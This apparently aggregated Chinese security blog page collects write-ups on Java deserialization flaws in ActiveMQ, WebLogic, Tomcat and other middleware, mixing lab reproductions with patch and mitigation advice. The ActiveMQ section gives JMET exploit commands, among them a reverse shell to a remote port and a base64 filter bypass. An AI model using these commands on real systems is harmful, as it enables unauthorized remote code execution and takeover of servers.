-
反序列化漏洞利用工具_ActiveMQ反序列化漏洞复现
2020-12-03 11:14:43ActiveMQ反序列化漏洞复现(CVE-2015-5254)前言:Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此...ActiveMQ反序列化漏洞复现(CVE-2015-5254)
前言:
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。
漏洞描述:
Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
使用vulhub进行搭建漏洞环境
# 进入某一个漏洞/环境的目录cd activemq/CVE-2015-5254/# 启动运行环境docker-compose -up -d
漏洞复现:
1. 构造(可以使用ysoserial)可执行命令的序列化对象
2. 作为一个消息,发送给目标61616端口
3. 访问web管理页面,读取消息,触发漏洞的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。工具:JMET
使用详情:
https://github.com/matthiaskaiser/jmet
下载地址:
https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
创建队列消息并写入命令。
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME ip 61616
进入容器转到/tmp目录下,发现没有创建文件,这是因为当执行命令后会给目标的ActiveMQ添加一个名为event 的队列,通过访问
http://ip:8161/admin/browse.jsp?JMSDestination=event
看到这个队列中所有的消息。
#列出所有在运行的容器信息。docker ps#进入容器docker exec -it cc0e9385f975 /bin/bash
点击触发后,执行命令。
命令执行成功。
反弹shell
直接反弹时无法成功。可以通过base64进行反弹。
无法反弹。
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -i >& /dev/tcp/ip/7777 0>&1" -Yp ROME ip 61616
base64绕过。
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo payload的basse64编码}|{base64,-d}|{bash,-i}" -Yp ROME ip 61616
反弹成功。
影响版本
Apache ActiveMQ <5.13.x
修复建议
升级到最新版本
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
-
WEBLOGIC中间件反序列化漏洞升级
2018-08-02 09:30:04年初查出了Oracle中间件weblogic反序列化漏洞weblogic-CVE-2018-2628,4月官方给出了升级补丁包,打上之后发现并没有修复漏洞,网上有临时方案,配置筛选器,也没什么鸟用,配不好server都启不来。 一直到7月,新的...先说下我的中间件版本 weblogic12c 12.2.3.1也是目前最新版本
年初查出了Oracle中间件weblogic反序列化漏洞weblogic-CVE-2018-2628,4月官方给出了升级补丁包,打上之后发现并没有修复漏洞,网上有临时方案,配置筛选器,也没什么鸟用,配不好server都启不来。
一直到7月,新的漏洞号weblogic-CVE-2018-2893出来了,官方立即给出了补丁,升级之后漏洞修复,需要注意是的这次补丁包需要升级Opatch工具版本,必须是13.9.4.0.0,下载地址会在另一篇文章给出。 -
反序列化漏洞原理_Weblogic 反序列化漏洞预警及解决方案
2020-12-14 16:11:33漏洞情况分析WebLogic Server 是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。...漏洞情况分析
WebLogic Server 是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。
wls9-async 组件为 WebLogic Server 提供异步通讯服务,默认应用于 WebLogic 部分版本。由于该 WAR 包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。
漏洞影响范围
根据 zoomeye 网络探测平台,目前全球共有10万多台 WebLogic 设备,其中中国具有3万多台。另外根据 CNVD 对 WebLogic 服务在全球范围内的分布情况的分析结果得知,我国境内已有2017个网站受此漏洞影响。
该漏洞的影响版本如下:
WebLogic 10.X
WebLogic 12.1.3
反序列化漏洞基本原理
Java 序列化与反序列化
Java 序列化是指把 Java 对象转换为字节序列的过程便于保存在内存、文件、数据库中,ObjectOutputStream 类的 writeObject() 方法可以实现序列化。
Java 反序列化是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类的 readObject() 方法用于反序列化。
序列化与反序列化是让 Java 对象脱离 Java 运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久化存储。
攻击者可以在未授权的情况下, 在WebLogic Server中执行反序列化操作,造成远程代码执行漏洞,而后利用该漏洞远程执行恶意代码、挖矿脚本、勒索病毒等。
临时解决方案
1停止 weblogic 服务
一般路径如下:
%DOMAIN_HOME%/bin/stopWebLogic.sh
2
删除相关 war 文件
具体路径如下:
版本号为10.*:
\Middleware\wlserver_10.3\server\lib\bea_wls9_async_response.war
%DOMAIN_HOME%\servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\
%DOMAIN_HOME%\servers\AdminServer\tmp\.internal\bea_wls9_async_response.war
\Middleware\wlserver_10.3\server\lib\ wls-wsat.war
%DOMAIN_HOME%\servers\AdminServer\tmp\.internal\ wls-wsat.war
版本号为12.1.3:
\Middleware\Oracle_Home\oracle_common\modules\com.oracle.webservices.wls.bea-wls9-async-response_12.1.3.war
%DOMAIN_HOME%\servers\AdminServer\tmp\.internal\com.oracle.webservices.wls.bea-wls9-async-response_12.1.3.war
%DOMAIN_HOME%\servers\AdminServer\tmp\_WL_internal\com.oracle.webservices.wls.bea-wls9-async-response_12.1.3
\Middleware\Oracle_Home\oracle_common\modules\com.oracle.webservices. wls-wsat.war
%DOMAIN_HOME%\servers\AdminServer\tmp\.internal\com.oracle.webservices.wls. wls-wsat.war
3
重启 weblogic 服务
一般路径如下:
%DOMAIN_HOME%/bin/startWebLogic.sh
4
禁止高危 URL 访问
通过访问策略控制禁止 /_async/* 及 /wls-wsat/* 路径的 URL 访问。
小结
目前 Oracle 官方还未为该漏洞提供相应补丁,建议使用 Weblogic server 相应版本的用户按照临时解决方案及时进行修复,并时刻关注补丁发布情况。
附官方 Oracle 安全补丁下载网址:
https://www.oracle.com/technetwork/topics/security/alerts-086861.html
第59号 公众账号致力于为行内、外所有关注数据安全的
企业同仁搭建一个只分享专业资讯、热点剖析、
行内大会的信息共享平台。
-
jboss反序列化漏洞检测工具
2019-02-15 12:35:17jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell -
rmi 反序列化漏洞_tomcat反序列化漏洞(cve-2016-8735)
2020-12-23 05:14:48将ApacheTomcat中间件的几大较为重要的高危漏洞做一个总结整理复现。用作来巩固更新自己的知识库。在这里感谢公司Bearcat师傅和残忆师傅以及李师傅等指导和共享精神。今天我们来一起复现一下Tomcat多版本远程代码...本文为原创文章,转载请注明出处!
复现起源:
近期在项目中碰到的ApacheTomcat中间件愈来愈多,于是乎。想着做一个整理。将ApacheTomcat中间件的几大较为重要的高危漏洞做一个总结整理复现。用作来巩固更新自己的知识库。
在这里感谢公司Bearcat师傅和残忆师傅以及李师傅等指导和共享精神。
今天我们来一起复现一下Tomcat多版本远程代码执行CVE-2016-8735。复现之前我们先来了解一下CVE-2016-8735。
漏洞描述:
该漏洞与之前Oracle发布的mxRemoteLifecycleListener反序列化漏洞(CVE-2016-3427)相关,是由于使用了JmxRemoteLifecycleListener的监听功能所导致。而在Oracle官方发布修复后,Tomcat未能及时修复更新而导致的远程代码执行。
该漏洞所造成的最根本原因是Tomcat在配置JMX做监控时使用了JmxRemoteLifecycleListener的方法。
漏洞影响版本:
ApacheTomcat 9.0.0.M1 到9.0.0.M11
ApacheTomcat 8.5.0 到8.5.6
ApacheTomcat 8.0.0.RC1 到8.0.38
ApacheTomcat 7.0.0 到7.0.72
ApacheTomcat 6.0.0 到6.0.47
漏洞利用条件:
外部需要开启JmxRemoteLifecycleListener监听的10001和10002端口,来实现远程代码执行。
漏洞复现:
所需环境工具包:
catalina-jmx-remote.jar:
https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.2/bin/extras/catalina-jmx-remote.jar
groovy-2.3.9.jar:
http://central.maven.org/maven2/org/codehaus/groovy/groovy/2.3.9/groovy-2.3.9.jar
ysoserial.jar:
https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
了解完漏洞详情之后,我们开始着手搭建环境来复现漏洞更深入的理解。
漏洞所需环境:
ApacheTomcat 8.5.2
Jdk1.7.0_80
安装成功如下图:
在进行漏洞复现之前我们需要配置几点如下:
conf/server.xml中第30行中配置启用JmxRemoteLifecycleListener功能监听的端口:
配置好jmx的端口后,我们在tomcat版本所对应的extras/目录下来下载catalina-jmx-remote.jar以及下载groovy-2.3.9.jar两个jar包。下载完成后放至在lib目录下。
接着我们再去bin目录下修改catalina.bat脚本。在ExecuteThe Requested Command注释前面添加这么一行。
主要配置的意思是设置启动tomcat的相关配置,不开启远程监听jvm信息。设置不启用他的ssl链接和不使用监控的账户。具体的配置可以去了解一下利用tomcat的jmx监控。
至此所有的配置成功保存后,我们运行tomcat。
顺带监听本地的10001和10002的RMI服务端口是否成功运行。
监听成功,我们开始来构造Payload执行命令。首先老套路弹个计算器。
漏洞利用:
一般我们可以利用该漏洞往tomcat的webapp程序目录下写一个文本文件去证明该漏洞存在。
以及可以直接向服务器上利用wget/copy等命令上传木马来进行获取webshell提权等。
漏洞修复方案:
1、关闭JmxRemoteLifecycleListener功能,或者是对jmx JmxRemoteLifecycleListener远程端口进行网络访问控制。同时,增加严格的认证方式。
2、根据官方去升级更新相对应的版本。
本系列文章友情链接
文章仅用于普及网络安全知识,提高小伙伴的安全意识的同时介绍常见漏洞的特征等,若读者因此做出危害网络安全的行为后果自负,与合天智汇以及原作者无关,特此声明。
-
Weblogic 反序列化漏洞历史
2018-08-10 14:46:57Weblogic 反序列化漏洞历史 0x00 weblogic简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用... -
java 反序列化漏洞 weblogic版本_WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析...
2021-03-22 13:50:47后来经过确认,这次***者所用的漏洞CVE编号为CVE-2017-10271,那么这个漏洞究竟是怎样造成的?0. 分析环境IDE:Intellij IDEA中间件版本: weblogic 10.3.6【未进行任何补丁修复】发包工具: brupsuite1. 漏洞成因我们先... -
远程命令执行与反序列化之——jboss中间件反序列化漏洞获取Webshell还原
2020-04-13 23:19:56jboss中间件反序列化漏洞获取Webshell还原 理论 可以在谷歌浏览器的wappalyzer插件中查看jboss相关信息 历史漏洞参考;https://www.seebug.org/appdir/JBoss https://www.jianshu.com/p/e34062e0a6f1 默认后台地址... -
WebLogic Java反序列化漏洞终极建议
2018-09-25 13:01:56title: WebLogic Java反序列化漏洞终极建议 ...本文针对这几年来WebLogic软件经常报出的java反序列化漏洞问题进行总结,其他中间件软件本文暂不讨论。内容主要涵盖客户最关心的一些问题、工程师... -
weblogic反序列化漏洞补丁
2017-09-11 22:08:40WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态... -
shiro 反序列化漏洞的检测与利用-burpsuite被动扫描联动篇
2020-12-19 00:06:09现在很多厂商都喜欢使用Tomcat中间件,而该中间件存在的漏洞除了比较出名的CNVD-2020-10487-Tomcat-Ajp远程文件包含漏洞外,最多的就是shiro反序列化漏洞了,那真是一扫一大片啊 那么我们在工作当中应该如何去识别这... -
ActiveMQ反序列化漏洞 CVE-2015-5254 漏洞复现
2021-02-20 14:11:12ActiveMQ反序列化漏洞 by ADummy 0x00利用路线 构造(可以使用ysoserial)可执行命令的序列化对象—>发送给目标61616端口—>访问web管理页面,读取消息,触发漏洞—>代码执行 0x01漏洞介绍 ... -
Weblogic反序列化漏洞验证、学习
2017-06-28 23:56:00前两天在做某客户的渗透项目时遇到好几个业务系统都是使用WebLogic中间件架构,查看版本是10.3.6.0的,但是在验证Weblogic反序列化漏洞的时候一直没有成功,客户应该是已经打过远程代码执行漏洞(CVE-2015-4852)的... -
weblogic 反序列化漏洞
2017-10-12 17:56:22著名的web中间件WebLogic被曝出之前的反序列化安全漏洞补丁存在绕过安全风险,用户更新补丁后,仍然存在被绕过成功执行远程命令攻击的情况,攻击者可以通过该漏洞获取系统权限,安全风险高,Oracle官方及时发 -
weblogic反序列化漏洞补丁3
2017-09-11 22:28:42WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态... -
weblogic反序列化漏洞补丁2
2017-09-11 22:23:41WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态... -
ActiveMQ 反序列化漏洞(CVE-2015-5254)
2019-08-01 11:41:31ActiveMQ 反序列化漏洞(CVE-2015-5254) ActiveMQ介绍: Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。什么是:消息中间件 ... -
Java反序列化漏洞实现
2018-10-22 17:06:00反来在运营商做乙方经常会因为java反反序列化漏洞要升级commons.collections或给中间件打补丁,前面说的两个问题还是不懂;今天又研究了番,也还不是很懂只是能弹计算器暂且先记一下。 二、序列化和反序列化 序列... -
ActiveMQ反序列化漏洞(CVE-2015-5254)复现
2020-12-10 03:04:55ActiveMQ反序列化漏洞(CVE-2015-5254)复现 导语 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.... -
activemq 进不去admin页面_ActiveMQ反序列化漏洞复现
2021-01-12 15:55:53ActiveMQ反序列化漏洞复现(CVE-2015-5254)前言:Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此... -
ActiveMQ 反序列化漏洞(CVE-2015-5254)复现及工具使用
2020-12-29 15:26:37ActiveMQ 反序列化漏洞(CVE-2015-5254) Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x... -
CVE-2017-3248——WebLogic反序列化漏洞利用工具
2017-07-20 10:15:00著名的web中间件WebLogic被曝出之前的反序列化安全漏洞补丁存在绕过安全风险,用户更新补丁后,仍然存在被绕过成功执行远程命令攻击的情况,安全风险高,...WebLogic 反序列化漏洞 官方评级: 高危 漏洞描述: Or... -
Weblogic wls-wsat反序列化漏洞修复
2019-03-09 21:12:31文章目录在于使用中间件的安全性方面,不进行处理的weblogic中间件会存在wls-wsat组件存在反序列化漏洞,利用该漏洞可执行系统命令,获取操作系统控制权限,特出此文档。因考虑到weblogic最新版本也在此漏洞范围之内... -
Java反序列化漏洞加固方法
2016-05-07 17:24:091、替换java包解决应用层面问题。 方法是使用官方提供的4.4.1版本commons-collections4...2、解决中间件层面问题。 方法一:升级weblogic补丁包,升级weblogic 10.3.6.12的补丁包p22248372_1036012_Generic.zip,直 -
ActiveMQ反序列化漏洞-CVE-2015-5254
2020-12-30 23:00:42Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码 漏洞复现 docker-... -
漏洞payload 靶机_漏洞复现:ActiveMQ反序列化漏洞(CVE20155254)
2020-12-28 01:57:44文章说明漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习。源码下载连接在文章最后。漏洞说明Apache ... -
ActiveMQ反序列化漏洞(CVE-2015-5254)
2021-01-22 11:08:20远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 2.影响版本 Apache ActiveMQ 5.13.0之前5.x版本 3.漏洞环境搭建 靶机:安装daocker环境centos7: 192.168.... -
activemq原理_ActiveMQ反序列化漏洞(CVE20155254)复现
2020-11-27 08:53:00漏洞详情漏洞说明#Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于... -
CVE-2015-5254(ActiveMQ 反序列化漏洞)复现
2021-03-19 09:07:34Apache ActiveMQ5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 漏洞复现 ...